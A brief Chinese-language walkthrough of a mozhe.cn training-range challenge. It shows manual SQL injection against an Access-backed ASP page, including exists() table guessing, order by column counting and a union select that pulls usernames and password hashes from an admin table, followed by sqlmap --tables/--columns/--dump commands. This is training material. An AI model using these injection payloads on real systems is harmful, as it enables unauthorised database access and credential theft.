https://www.mozhe.cn/bug/detail/89
手工注入
开启靶场后,既然说明了是sql注入,那就不爆破了,看到那有个维护的说明,点开看看
image.png
image.png
加单引号测试
image.png
and 1=1是没有问题
image.png
and 1=2 不显示 说明是有sql注入的
image.png
access没有库 所以我们需要先猜表
exists()
http://219.153.49.228:49048/new_list.asp?id=1%20and%20exists(select%20*%20from%20user)
image.png
说明user表不对
image.png
运行不报错,说明存在admin表
接着利用order by猜有几列 order by 4不报错 说明是4列
image.png
然后利用语句union select 1,username,passwd,id from admin 拿账号密码
image.png
然后去md5解密。
使用sqlmap注入
image.png
image.png
拿表:--tables
image.png
拿到表之后 猜字段:--columns -T admin
image.png
使用字段username password 拿数据:--dump -T admin -C "admin,passwd"
image.png
image.png
也拿到了密码
image.png
image.png